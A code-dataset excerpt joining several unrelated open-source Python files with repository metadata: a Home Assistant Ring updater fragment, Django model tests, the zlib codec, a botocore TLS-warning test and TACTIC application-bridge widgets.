                await self.devices[device.device_id]["task"]

        # Deliver the (possibly just fetched) data to the new listener.
        update_callback(self.devices[device.device_id]["data"])

    @callback
    def async_untrack_device(self, device, update_callback):
        """Untrack a device."""
        self.devices[device.device_id]["update_callbacks"].remove(update_callback)
        if not self.devices[device.device_id]["update_callbacks"]:
            self.devices.pop(device.device_id)

        # No devices left: cancel the polling interval.
        if not self.devices:
            self._unsub_interval()
            self._unsub_interval = None

    def refresh_all(self, _=None):
        """Refresh all registered devices."""
        # May run in an executor thread (see async_refresh_all in setup),
        # hence call_soon_threadsafe below when notifying listeners.
        for device_id, info in self.devices.items():
            try:
                data = info["data"] = self.update_method(info["device"])
            except AccessDeniedError:
                _LOGGER.error("Ring access token is no longer valid. Set up Ring again")
                self.hass.add_job(
                    self.hass.config_entries.async_unload(self.config_entry_id)
                )
                return
            except requests.Timeout:
                _LOGGER.warning(
                    "Time out fetching Ring %s data for device %s",
                    self.data_type,
                    device_id,
                )
                continue
            except requests.RequestException as err:
                _LOGGER.warning(
                    "Error fetching Ring %s data for device %s: %s",
                    self.data_type,
                    device_id,
                    err,
                )
                continue

            for update_callback in info["update_callbacks"]:
                self.hass.loop.call_soon_threadsafe(update_callback, data)
| apache-2.0 |
akshaybabloo/gollahalli-com | gollahalli_cms/editor/tests/test_models.py | 1 | 26159 | import datetime
import os
import shutil
import unittest.mock as mock
from io import BytesIO
import pytz
from PIL import Image
from django.conf import settings
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from gollahalli_cms.editor.models import ContentModel, EducationModel, ProjectsModel, TutorialsModel, ExperienceModel, SkillsModel, \
SkillsContentModel, PublicationsModel, PublicationsContentModel, MetaContentModel
def mock_datetime_now():
    """
    Fixed, timezone-aware "now" used to patch ``django.utils.timezone.now``.

    Returns
    -------
    datetime: datetime
        Always 2013-11-20 20:08:07.127325 UTC, so timestamps written by the
        models under test are deterministic.
    """
    # datetime.timezone.utc compares equal to pytz.UTC for aware datetimes
    # but needs no third-party dependency.
    return datetime.datetime(2013, 11, 20, 20, 8, 7, 127325,
                             tzinfo=datetime.timezone.utc)
def mock_date():
    """
    Fixed calendar date used by the model tests.

    Returns
    -------
    datetime: date
        Always 2013-11-20.
    """
    return datetime.date(year=2013, month=11, day=20)
class ContentModelTest(TestCase):
    """
    Test case for `ContentModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `ContentModel` and mocks django `timezone`
        """
        # Build a small in-memory JPEG so no on-disk fixture is needed.
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        ContentModel.objects.create(ref_id=1,
                                    website_name="Akshay Raj Gollahalli",
                                    cv=SimpleUploadedFile('best_file_eva.txt',
                                                          'these are the file contents!'.encode('utf-8')),
                                    bio="bio",
                                    url="https://www.example.com",
                                    first_name="Some name",
                                    last_name="last name",
                                    email_id="name@example.com",
                                    github="https://www.github.com",
                                    twitter="https://www.twitter.com",
                                    linkedin="https://www.linkedin.com",
                                    file=SimpleUploadedFile('content_model.txt',
                                                            'these are the file contents!'.encode('utf-8')),
                                    image=InMemoryUploadedFile(im_io, None, 'content_model.jpg', 'image/jpeg', im_io,
                                                               None))

    def test_model(self):
        """
        Tests `ref_id`, `website_name`, `bio`, `url`, `first_name`, `last_name`, `email_id`, `github`, `twitter` and
        `linkedin`.
        """
        content = ContentModel.objects.get(ref_id=1)
        self.assertEqual(content.ref_id, 1)
        self.assertEqual(content.website_name, "Akshay Raj Gollahalli")
        self.assertEqual(content.bio, "bio")
        self.assertEqual(content.url, "https://www.example.com")
        self.assertEqual(content.first_name, "Some name")
        self.assertEqual(content.last_name, "last name")
        self.assertEqual(content.email_id, "name@example.com")
        self.assertEqual(content.github, "https://www.github.com")
        self.assertEqual(content.twitter, "https://www.twitter.com")
        self.assertEqual(content.linkedin, "https://www.linkedin.com")

    def test_timedate(self):
        """
        Tests `created` and `updated` date and time.
        """
        # timezone.now was patched in setUp, so `updated` must equal the mock.
        content = ContentModel.objects.get(ref_id=1)
        self.assertEqual(content.updated, mock_datetime_now())

    def test_uploads(self):
        """
        Tests file uploads of `cv`, `file`, and `image`
        """
        content = ContentModel.objects.get(ref_id=1)
        self.assertEqual(content.cv, content.cv.name)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def test_re_upload(self):
        """
        Testing re-uploads for `cv`, `file`, and `image`
        """
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        ContentModel.objects.update(ref_id=1,
                                    cv=SimpleUploadedFile('best_file_eva_1.txt',
                                                          'these are the file contents!'.encode('utf-8')),
                                    file=SimpleUploadedFile('content_model_1.txt',
                                                            'these are the file contents!'.encode('utf-8')),
                                    image=InMemoryUploadedFile(im_io, None, 'content_model_1.jpg', 'image/jpeg', im_io,
                                                               None))
        content = ContentModel.objects.get(ref_id=1)
        self.assertEqual(content.cv, content.cv.name)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def tearDown(self):
        # Remove everything the upload fields wrote under MEDIA_ROOT.
        for file_object in os.listdir(settings.MEDIA_ROOT):
            file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
            if os.path.isfile(file_object_path):
                os.unlink(file_object_path)
            else:
                shutil.rmtree(file_object_path)
class EducationModelTest(TestCase):
    """
    Test case for `EducationModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `EducationModel` and mocks django `timezone`
        """
        # Build a small in-memory JPEG so no on-disk fixture is needed.
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        # EducationModel has a foreign key to ContentModel via ref_id.
        model = ContentModel.objects.create(ref_id=1)
        EducationModel.objects.create(id=1,
                                      ref_id=model,
                                      title="some title",
                                      from_date=mock_date(),
                                      to_date=mock_date(),
                                      where="somewhere",
                                      current=True,
                                      file=SimpleUploadedFile('education_model.txt',
                                                              'these are the file contents!'.encode('utf-8')),
                                      image=InMemoryUploadedFile(im_io, None, 'education_model.jpg', 'image/jpeg',
                                                                 im_io,
                                                                 None))

    def test_model(self):
        """
        Tests `id`, `title`, `from_date`, `to_date`, `where` and `current`.
        """
        content = EducationModel.objects.get(id=1)
        self.assertEqual(content.id, 1)
        self.assertEqual(content.title, "some title")
        self.assertEqual(content.from_date, mock_date())
        self.assertEqual(content.to_date, mock_date())
        self.assertEqual(content.where, "somewhere")
        self.assertEqual(content.current, True)

    def test_files(self):
        """
        Tests `file` and `image`.
        """
        content = EducationModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def test_re_upload(self):
        """
        Testing re-uploads for `file`, and `image`
        """
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        EducationModel.objects.update(id=1,
                                      file=SimpleUploadedFile('education_model_1.txt',
                                                              'these are the file contents!'.encode('utf-8')),
                                      image=InMemoryUploadedFile(im_io, None, 'education_model_1.jpg', 'image/jpeg',
                                                                 im_io,
                                                                 None))
        content = EducationModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def tearDown(self):
        # Remove everything the upload fields wrote under MEDIA_ROOT.
        for file_object in os.listdir(settings.MEDIA_ROOT):
            file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
            if os.path.isfile(file_object_path):
                os.unlink(file_object_path)
            else:
                shutil.rmtree(file_object_path)
class ProjectsModelTest(TestCase):
    """
    Test case for `ProjectsModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `ProjectsModel` and mocks django `timezone`
        """
        # Build a small in-memory JPEG so no on-disk fixture is needed.
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        # ProjectsModel has a foreign key to ContentModel via ref_id.
        model = ContentModel.objects.create(ref_id=1)
        ProjectsModel.objects.create(id=1,
                                     ref_id=model,
                                     link="https://www.example.com",
                                     title="some title",
                                     category="some category",
                                     long_description="very long description\n yes very long",
                                     short_description="short description",
                                     file=SimpleUploadedFile('project_model.txt',
                                                             'these are the file contents!'.encode('utf-8')),
                                     image=InMemoryUploadedFile(im_io, None, 'project_model.jpg', 'image/jpeg',
                                                                im_io,
                                                                None))

    def test_model(self):
        """
        Tests `id`, `link`, `title`, `category`, `long_description`, and `short_description`
        """
        content = ProjectsModel.objects.get(id=1)
        self.assertEqual(content.id, 1)
        self.assertEqual(content.link, "https://www.example.com")
        self.assertEqual(content.title, "some title")
        self.assertEqual(content.category, "some category")
        self.assertEqual(content.long_description, "very long description\n yes very long")
        self.assertEqual(content.short_description, "short description")

    def test_files(self):
        """
        Tests `file` and `image`.
        """
        content = ProjectsModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def test_re_upload(self):
        """
        Testing re-uploads for `file`, and `image`
        """
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        ProjectsModel.objects.update(id=1,
                                     file=SimpleUploadedFile('project_model_1.txt',
                                                             'these are the file contents!'.encode('utf-8')),
                                     image=InMemoryUploadedFile(im_io, None, 'project_model_1.jpg', 'image/jpeg',
                                                                im_io,
                                                                None))
        content = ProjectsModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def tearDown(self):
        # Remove everything the upload fields wrote under MEDIA_ROOT.
        for file_object in os.listdir(settings.MEDIA_ROOT):
            file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
            if os.path.isfile(file_object_path):
                os.unlink(file_object_path)
            else:
                shutil.rmtree(file_object_path)
class TutorialsModelTest(TestCase):
    """
    Test case for `TutorialsModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `TutorialsModel` and mocks django `timezone`
        """
        # Build a small in-memory JPEG so no on-disk fixture is needed.
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        # TutorialsModel has a foreign key to ContentModel via ref_id.
        model = ContentModel.objects.create(ref_id=1)
        TutorialsModel.objects.create(id=1,
                                      ref_id=model,
                                      link="https://www.example.com",
                                      title="some title",
                                      long_description="very long description\n yes very long",
                                      file=SimpleUploadedFile('tutorials_model.txt',
                                                              'these are the file contents!'.encode('utf-8')),
                                      image=InMemoryUploadedFile(im_io, None, 'tutorials_model.jpg', 'image/jpeg',
                                                                 im_io,
                                                                 None))

    def test_model(self):
        """
        Tests `id`, `link`, `title` and `long_description`
        """
        content = TutorialsModel.objects.get(id=1)
        self.assertEqual(content.id, 1)
        self.assertEqual(content.link, "https://www.example.com")
        self.assertEqual(content.title, "some title")
        self.assertEqual(content.long_description, "very long description\n yes very long")

    def test_files(self):
        """
        Tests `file` and `image`.
        """
        content = TutorialsModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def test_re_upload(self):
        """
        Testing re-uploads for `file`, and `image`
        """
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        TutorialsModel.objects.update(id=1,
                                      file=SimpleUploadedFile('tutorial_model_1.txt',
                                                              'these are the file contents!'.encode('utf-8')),
                                      image=InMemoryUploadedFile(im_io, None, 'tutorial_model_1.jpg', 'image/jpeg',
                                                                 im_io,
                                                                 None))
        content = TutorialsModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def tearDown(self):
        # Remove everything the upload fields wrote under MEDIA_ROOT.
        for file_object in os.listdir(settings.MEDIA_ROOT):
            file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
            if os.path.isfile(file_object_path):
                os.unlink(file_object_path)
            else:
                shutil.rmtree(file_object_path)
class ExperienceModelTest(TestCase):
    """
    Test case for `ExperienceModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `ExperienceModel` and mocks django `timezone`
        """
        # ExperienceModel has a foreign key to ContentModel via ref_id;
        # it carries no file/image fields, so no tearDown is needed.
        model = ContentModel.objects.create(ref_id=1)
        ExperienceModel.objects.create(id=1,
                                       ref_id=model,
                                       title="some title",
                                       from_date=mock_date(),
                                       to_date=mock_date(),
                                       where_city="some city",
                                       where_country="some country",
                                       current=True,
                                       company="some company")

    def test_model(self):
        """
        Tests `id`, `title`, `from_date`, `to_date`, `where_city`, `where_country`, `company` and `current`.
        """
        content = ExperienceModel.objects.get(id=1)
        self.assertEqual(content.id, 1)
        self.assertEqual(content.title, "some title")
        self.assertEqual(content.from_date, mock_date())
        self.assertEqual(content.to_date, mock_date())
        self.assertEqual(content.where_city, "some city")
        self.assertEqual(content.where_country, "some country")
        self.assertEqual(content.company, "some company")
        self.assertEqual(content.current, True)
class SkillsModelTest(TestCase):
    """
    Test case for `SkillsModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `SkillsModel` and mocks django `timezone`
        """
        # SkillsModel has a foreign key to ContentModel via ref_id.
        model = ContentModel.objects.create(ref_id=1)
        SkillsModel.objects.create(ref_id=model, type_of_skill="some type")

    def test_model(self):
        """
        Tests `type_of_skill`
        """
        content = SkillsModel.objects.get(type_of_skill="some type")
        self.assertEqual(content.type_of_skill, "some type")
class SkillsContentModelTest(TestCase):
    """
    Test case for `SkillsContentModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `SkillsContentModel` and mocks django `timezone`
        """
        # Build a small in-memory JPEG so no on-disk fixture is needed.
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        # SkillsContentModel hangs off SkillsModel via type_of_skill.
        model = ContentModel.objects.create(ref_id=1)
        skills_model = SkillsModel.objects.create(ref_id=model, type_of_skill="some type")
        SkillsContentModel.objects.create(id=1,
                                          type_of_skill=skills_model,
                                          content="some content",
                                          file=SimpleUploadedFile('skills_content_model.txt',
                                                                  'these are the file contents!'.encode('utf-8')),
                                          image=InMemoryUploadedFile(im_io, None, 'skills_content_model.jpg',
                                                                     'image/jpeg',
                                                                     im_io,
                                                                     None))

    def test_model(self):
        """
        Tests `id` and `content`
        """
        content = SkillsContentModel.objects.get(id=1)
        self.assertEqual(content.id, 1)
        self.assertEqual(content.content, "some content")

    def test_files(self):
        """
        Tests `file` and `image`.
        """
        content = SkillsContentModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def test_re_upload(self):
        """
        Testing re-uploads for `file`, and `image`
        """
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        SkillsContentModel.objects.update(id=1,
                                          file=SimpleUploadedFile('skills_content_model_1.txt',
                                                                  'these are the file contents!'.encode('utf-8')),
                                          image=InMemoryUploadedFile(im_io, None, 'skills_content_model_1.jpg',
                                                                     'image/jpeg', im_io, None))
        content = SkillsContentModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def tearDown(self):
        # Remove everything the upload fields wrote under MEDIA_ROOT.
        for file_object in os.listdir(settings.MEDIA_ROOT):
            file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
            if os.path.isfile(file_object_path):
                os.unlink(file_object_path)
            else:
                shutil.rmtree(file_object_path)
class PublicationsModelTest(TestCase):
    """
    Test case for `PublicationsModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `PublicationsModel` and mocks django `timezone`
        """
        # PublicationsModel has a foreign key to ContentModel via ref_id.
        model = ContentModel.objects.create(ref_id=1)
        PublicationsModel.objects.create(ref_id=model, type_of_publication="some publication")

    def test_model(self):
        """
        Tests `type_of_publication`
        """
        content = PublicationsModel.objects.get(type_of_publication="some publication")
        self.assertEqual(content.type_of_publication, "some publication")
class PublicationsContentModelTest(TestCase):
    """
    Test case for `PublicationsContentMode`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up the `PublicationsModel` and mocks django `timezone`
        """
        # Build a small in-memory JPEG so no on-disk fixture is needed.
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        # PublicationsContentModel hangs off PublicationsModel.
        model = ContentModel.objects.create(ref_id=1)
        publication_model = PublicationsModel.objects.create(ref_id=model, type_of_publication="some publication")
        PublicationsContentModel.objects.create(id=1,
                                                type_of_publication=publication_model,
                                                content="some content",
                                                file=SimpleUploadedFile('publication_content_model.txt',
                                                                        'these are the file contents!'.encode('utf-8')),
                                                image=InMemoryUploadedFile(im_io, None, 'publication_content_model.jpg',
                                                                           'image/jpeg',
                                                                           im_io,
                                                                           None))

    def test_model(self):
        """
        Tests `id` and `content`
        """
        content = PublicationsContentModel.objects.get(id=1)
        self.assertEqual(content.id, 1)
        self.assertEqual(content.content, "some content")

    def test_files(self):
        """
        Tests `file` and `image`.
        """
        content = PublicationsContentModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def test_re_upload(self):
        """
        Testing re-uploads for `file`, and `image`
        """
        im = Image.new(mode='RGB', size=(200, 200))  # create a new image using PIL
        im_io = BytesIO()  # a BytesIO object for saving image
        im.save(im_io, 'JPEG')  # save the image to im_io
        im_io.seek(0)

        PublicationsContentModel.objects.update(id=1,
                                                file=SimpleUploadedFile('publication_content_model_1.txt',
                                                                        'these are the file contents!'.encode('utf-8')),
                                                image=InMemoryUploadedFile(im_io, None,
                                                                           'publication_content_model_1.jpg',
                                                                           'image/jpeg', im_io, None))
        content = PublicationsContentModel.objects.get(id=1)
        self.assertEqual(content.file, content.file.name)
        self.assertEqual(content.image, content.image.name)

    def tearDown(self):
        # Remove everything the upload fields wrote under MEDIA_ROOT.
        for file_object in os.listdir(settings.MEDIA_ROOT):
            file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
            if os.path.isfile(file_object_path):
                os.unlink(file_object_path)
            else:
                shutil.rmtree(file_object_path)
class MetaContentModelTest(TestCase):
    """
    Test case for `MetaContentModel`
    """

    @mock.patch('django.utils.timezone.now', mock_datetime_now)
    def setUp(self):
        """
        Sets up `MetaContentModel`
        """
        # MetaContentModel is standalone (no FK, no file fields).
        MetaContentModel.objects.create(ref_id=1,
                                        header="some header",
                                        footer="some footer",
                                        meta="some meta")

    def test_model(self):
        """
        Tests `id`, `header`, `footer` and `meta`
        """
        content = MetaContentModel.objects.get(ref_id=1)
        self.assertEqual(content.ref_id, 1)
        self.assertEqual(content.header, "some header")
        self.assertEqual(content.footer, "some footer")
        self.assertEqual(content.meta, "some meta")
| mit |
Microvellum/Fluid-Designer | win64-vc/2.78/python/lib/encodings/zlib_codec.py | 202 | 2204 | """Python 'zlib_codec' Codec - zlib compression encoding.
This codec de/encodes from bytes to bytes.
Written by Marc-Andre Lemburg (mal@lemburg.com).
"""
import codecs
import zlib # this codec needs the optional zlib module !
### Codec APIs
def zlib_encode(input, errors='strict'):
    """Compress *input* with zlib and return (output, length consumed)."""
    # Bytes-to-bytes codec: only 'strict' error handling is meaningful.
    assert errors == 'strict'
    compressed = zlib.compress(input)
    return (compressed, len(input))
def zlib_decode(input, errors='strict'):
    """Decompress zlib-compressed *input* and return (output, length consumed)."""
    # Bytes-to-bytes codec: only 'strict' error handling is meaningful.
    assert errors == 'strict'
    decompressed = zlib.decompress(input)
    return (decompressed, len(input))
class Codec(codecs.Codec):
    """Stateless bytes-to-bytes codec delegating to the module-level helpers."""

    def encode(self, input, errors='strict'):
        return zlib_encode(input, errors)

    def decode(self, input, errors='strict'):
        return zlib_decode(input, errors)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental zlib compressor; feed chunks to encode(), flush with final=True."""

    def __init__(self, errors='strict'):
        assert errors == 'strict'
        self.errors = errors
        self.compressobj = zlib.compressobj()

    def encode(self, input, final=False):
        data = self.compressobj.compress(input)
        if final:
            # Emit whatever the compressor is still buffering internally.
            data = data + self.compressobj.flush()
        return data

    def reset(self):
        # Start a fresh compression stream.
        self.compressobj = zlib.compressobj()
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental zlib decompressor; feed chunks to decode(), flush with final=True."""

    def __init__(self, errors='strict'):
        assert errors == 'strict'
        self.errors = errors
        self.decompressobj = zlib.decompressobj()

    def decode(self, input, final=False):
        data = self.decompressobj.decompress(input)
        if final:
            # Emit any remaining buffered output and finalize the stream.
            data = data + self.decompressobj.flush()
        return data

    def reset(self):
        # Start a fresh decompression stream.
        self.decompressobj = zlib.decompressobj()
class StreamWriter(Codec, codecs.StreamWriter):
    # Buffer bytes, not str: this is a bytes-to-bytes codec.
    charbuffertype = bytes
class StreamReader(Codec, codecs.StreamReader):
    # Buffer bytes, not str: this is a bytes-to-bytes codec.
    charbuffertype = bytes
### encodings module API
def getregentry():
    """Return the CodecInfo entry used by the encodings search function."""
    return codecs.CodecInfo(
        name='zlib',
        encode=zlib_encode,
        decode=zlib_decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
        # bytes-to-bytes codec: not usable via str.encode()/bytes.decode()
        _is_text_encoding=False,
    )
| gpl-3.0 |
boto/botocore | tests/functional/test_iot_data.py | 2 | 1629 | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import sys
from tests import unittest, mock, BaseSessionTest
from botocore.exceptions import UnsupportedTLSVersionWarning
class TestOpensslVersion(BaseSessionTest):
    """Verify the TLS warning emitted when creating an iot-data client."""

    def test_incompatible_openssl_version(self):
        # OpenSSL 0.9.8 is below the version botocore considers sufficient
        # for this service, so client creation should warn.
        with mock.patch('ssl.OPENSSL_VERSION_INFO', new=(0, 9, 8, 11, 15)):
            with mock.patch('warnings.warn') as mock_warn:
                self.session.create_client('iot-data', 'us-east-1')
                call_args = mock_warn.call_args[0]
                warning_message = call_args[0]
                warning_type = call_args[1]
                # We should say something specific about the service.
                self.assertIn('iot-data', warning_message)
                self.assertEqual(warning_type, UnsupportedTLSVersionWarning)

    def test_compatible_openssl_version(self):
        # A modern OpenSSL (1.0.1+) must not trigger any warning.
        with mock.patch('ssl.OPENSSL_VERSION_INFO', new=(1, 0, 1, 1, 1)):
            with mock.patch('warnings.warn') as mock_warn:
                self.session.create_client('iot-data', 'us-east-1')
                self.assertFalse(mock_warn.called)
| apache-2.0 |
mwx1993/TACTIC | src/tactic/ui/cgapp/app_init_wdg.py | 6 | 7053 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
__all__ = [ 'PyMayaInit', 'PyFlashInit', 'PyRepoActionInit', 'PyHoudiniInit', 'PyXSIInit']
from pyasm.biz import PrefSetting, Project
from pyasm.web import Html, WebContainer, Widget, DivWdg
from pyasm.widget import HiddenWdg
class PyMayaInit(Widget):
    """Emit the client-side bootstrap (loader JS plus hidden inputs) that
    initializes the Maya integration in the browser.

    Note: TACTIC convention uses ``my`` instead of ``self``; this is
    Python 2 code (see the print statement below).
    """

    def get_display(my):
        div = DivWdg()

        # this is to prevent this function from being run in other tabs
        web = WebContainer.get_web()

        # Per-session values substituted into the JS template below.
        user = WebContainer.get_user_name()
        local_dir = web.get_local_dir()
        context_url = web.get_site_context_url().to_string()
        http_server = web.get_base_url().to_string()
        upload_url = web.get_upload_url()
        project_code = Project.get_project_code()

        # On page load: fetch PyMaya.js, instantiate PyMaya (app is null if
        # the ActiveX/plugin bridge is unavailable), then configure it.
        div.add_behavior( {
            'type': 'load',
            'cbjs_action': '''
            var js_files = [
                "/context/javascript/PyMaya.js",
            ];
            var supp_js_files = [
                "/context/spt_js/fx_anim.js",
                "/context/javascript/PyHoudini.js",
                "/context/javascript/PyXSI.js"
            ];
            var set_up = function() {
                try {
                    app = new PyMaya(); }
                catch(e) {
                    app = null;
                }
                if (app) {
                    app.user = '%(user)s';
                    app.local_dir = '%(local_dir)s';
                    app.context_url = '%(context_url)s';
                    app.base_url = '%(server)s';
                    app.upload_url = '%(upload_url)s';
                    app.project_code = '%(project_code)s';
                }
            }
            spt.dom.load_js(js_files, function() {PyMaya(); set_up();});
            spt.dom.load_js(supp_js_files, function() {});
            '''%{
                'user': user,
                'local_dir': local_dir,
                'context_url' : context_url,
                'server': http_server,
                'upload_url': upload_url,
                'project_code': project_code }
        })

        #pref = PrefSetting.get_value_by_key("use_java_maya")
        #if pref == "true":
        #    html.writeln("<script>app.use_java = true</script>")

        handoff_dir = web.get_client_handoff_dir(no_exception=True)
        if not handoff_dir:
            print "WARNING: handoff_dir is empty in the TACTIC config file"

        server = web.get_http_host()
        application = "maya"

        # Hidden form fields read back by the client-side scripts.
        div.add( HiddenWdg("user", user) )
        div.add( HiddenWdg("handoff_dir", handoff_dir) )
        div.add( HiddenWdg("project_code", project_code) )
        div.add( HiddenWdg("local_dir", local_dir) )
        div.add( HiddenWdg("server_name", server) )
        div.add( HiddenWdg("application", application) )
        #div.add( HiddenWdg("base_url", server) )
        #div.add( HiddenWdg("upload_url", upload_url) )

        return div
class PyFlashInit(Widget):
    """Emit the inline scripts that create and configure the client-side
    ``pyflash`` object (TACTIC convention: ``my`` instead of ``self``)."""

    def get_display(my):
        web = WebContainer.get_web()
        html = Html()
        html.writeln("<script>var pyflash=new PyFlash()</script>")

        # add in parameters for pyflash
        user = WebContainer.get_user_name()
        html.writeln("<script>pyflash.user = '%s'</script>" % user)
        local_dir = web.get_local_dir()
        html.writeln("<script>pyflash.local_dir = '%s'</script>" % local_dir)
        server = web.get_base_url().to_string()
        html.writeln("<script>pyflash.server_url = '%s'</script>" % server)
        context_url = web.get_site_context_url().to_string()
        html.writeln("<script>pyflash.context_url = '%s%s'</script>" % (server, context_url))
        upload_url = web.get_upload_url()
        html.writeln("<script>pyflash.upload_url = '%s'</script>" % upload_url)
        return html
class PyHoudiniInit(Widget):
    """Widget that emits the <script> bootstrap for the PyHoudini bridge."""
    def get_display(my):
        web = WebContainer.get_web()
        user = WebContainer.get_user_name()
        local_dir = web.get_local_dir()
        context_url = web.get_site_context_url().to_string()
        server = web.get_base_url().to_string()
        upload_url = web.get_upload_url()
        html = Html()
        # Houdini-side helper script; presumably required before PyHoudini
        # can issue hcommands — TODO confirm against the Houdini plugin.
        html.writeln('<script language="JavaScript" src="resource:///res/RunHCommand.js"></script>')
        # Create the global "app" object and stamp session settings on it.
        html.writeln('''\n<script>try{ app = new PyHoudini(); }
catch(e){
app = null;}
if (app) {
app.user = '%(user)s';
app.local_dir = '%(local_dir)s';
app.context_url = '%(context_url)s';
app.base_url = '%(server)s';
app.upload_url = '%(upload_url)s';
app.project_code = '%(project_code)s';} </script>'''%{'user': user,
            'local_dir': local_dir,
            'context_url' : context_url,
            'server': server,
            'upload_url': upload_url,
            'project_code': Project.get_project_code()})
        return html
class PyXSIInit(Widget):
    """Widget that emits the <script> bootstrap for the PyXSI bridge."""
    def get_display(my):
        web = WebContainer.get_web()
        user = WebContainer.get_user_name()
        local_dir = web.get_local_dir()
        context_url = web.get_site_context_url().to_string()
        server = web.get_base_url().to_string()
        upload_url = web.get_upload_url()
        html = Html()
        # Create the global "app" object and stamp session settings on it;
        # mirrors PyHoudiniInit minus the RunHCommand helper script.
        html.writeln('''\n<script>try{ app = new PyXSI(); }
catch(e){
app = null;}
if (app) {
app.user = '%(user)s';
app.local_dir = '%(local_dir)s';
app.context_url = '%(context_url)s';
app.base_url = '%(server)s';
app.upload_url = '%(upload_url)s';
app.project_code = '%(project_code)s';} </script>'''%{'user': user,
            'local_dir': local_dir,
            'context_url' : context_url,
            'server': server,
            'upload_url': upload_url,
            'project_code': Project.get_project_code()})
        return html
class PyRepoActionInit(Widget):
    """Widget that creates the client-side Perforce and Tactic repo objects."""
    def get_display(my):
        html = Html()
        html.writeln("<script>var pyp4=new PyPerforce()</script>")
